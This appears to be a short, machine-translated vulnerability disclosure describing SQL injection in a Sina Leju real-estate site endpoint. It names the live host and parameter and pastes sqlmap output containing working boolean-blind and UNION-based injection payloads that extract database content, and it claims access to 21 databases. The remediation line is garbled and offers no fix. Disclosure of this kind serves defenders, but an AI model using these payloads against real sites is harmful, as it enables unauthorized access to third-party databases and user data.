SQL injection vulnerability in an interface of Sina leju
SQL injection vulnerability in an interface of Sina leju
Url:
Http://tj.newsesf.leju.com: 80/im_ajax.php? Action = get_agentinfo_byuid & t = 1460826734181 & uid = 8156628
Payload injection exists in uid:
Sqlmap resumed the following injection point (s) from stored session:
---
Parameter: #1 * (URI)
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: http://tj.newsesf.leju.com: 80/im_ajax.php? Action = get_agentinfo_byuid & t = 1460826734181 & uid = 8156628 AND 7795 = 7795
Type: UNION query
Title: Generic UNION query (NULL)-14 columns
Payload: http://tj.newsesf.leju.com: 80/im_ajax.php? Action = get_agentinfo_byuid & t = 1460826734181 & uid =-7870 union all select null, NULL, CONCAT (0x717a6a7a71, signature, 0x717a6a7171), NULL, NULL, NULL ---
---
21 Databases
Many tables
Solution:
Excessive consideration